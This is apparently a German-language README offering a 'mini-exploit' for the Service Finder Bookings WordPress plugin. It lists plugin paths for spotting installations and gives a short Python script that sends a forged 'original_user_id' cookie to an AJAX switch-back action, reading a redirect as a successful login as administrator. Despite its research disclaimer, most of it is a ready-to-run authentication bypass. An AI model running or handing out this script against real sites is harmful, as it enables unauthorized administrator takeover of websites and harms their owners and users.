
Ein Mini-Exploit für das Service Finder -Bookings Plugin WP
Das Service Finder-Plugin ist ein Buchungs- und Dienstleistungsverwaltungssystem für WordPress.
Aufgrund seiner Beliebtheit und Komplexität wiesen einige Versionen Sicherheitsprobleme im Zusammenhang mit nicht authentifizierten AJAX-Endpunkten oder unzureichenden Zugriffskontrollen auf.
Dieses README erklärt, wie Forscher Installationen sicher identifizieren und ethische Praktiken befolgen können (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ Haftungsausschluss:
Diese Suchen dienen ausschließlich Bildungs- und Forschungszwecken. Versuchen Sie keinen unbefugten Zugriff oder Exploit.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ VERWUNDBAR! Weiterleitung zum Admin-Panel als ADMIN400-499: ⚠️ Client-Fehler — die Anfrage war ungültig oder unbefugt, nicht verwundbar